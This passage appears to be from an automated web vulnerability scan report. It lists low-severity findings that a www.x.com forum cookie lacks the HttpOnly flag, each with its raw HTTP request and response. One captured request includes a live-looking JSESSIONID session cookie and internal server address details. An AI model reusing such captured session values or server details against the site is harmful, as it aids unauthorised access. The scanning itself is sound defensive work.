Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.149. https://www.x.com/message/212170

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.150. https://www.x.com/message/212753

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.151. https://www.x.com/message/212906

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.152. https://www.x.com/message/213354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.153. https://www.x.com/message/213546

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.154. https://www.x.com/message/213568

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.155. https://www.x.com/message/213571

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.156. https://www.x.com/message/213767

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333637393b312c35333638373b312c35333636373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.157. https://www.x.com/message/213787

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.158. https://www.x.com/message/213788

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.159. https://www.x.com/message/213865

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.160. https://www.x.com/message/214347

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.161. https://www.x.com/message/214440

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.162. https://www.x.com/message/214618

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.163. https://www.x.com/message/214902

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.164. https://www.x.com/message/214926

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.165. https://www.x.com/message/215245

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.166. https://www.x.com/message/215254

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.167. https://www.x.com/message/215264

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.168. https://www.x.com/message/215276

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333937373b312c35343036353b312c35343035383b312c34373636333b312c35333838343b312c35333135383b312c35333137323b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.169. https://www.x.com/message/215291

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.170. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.171. https://www.x.com/people/CorinneSherman

Summary

Severity:   Information
Confidence:   Certain
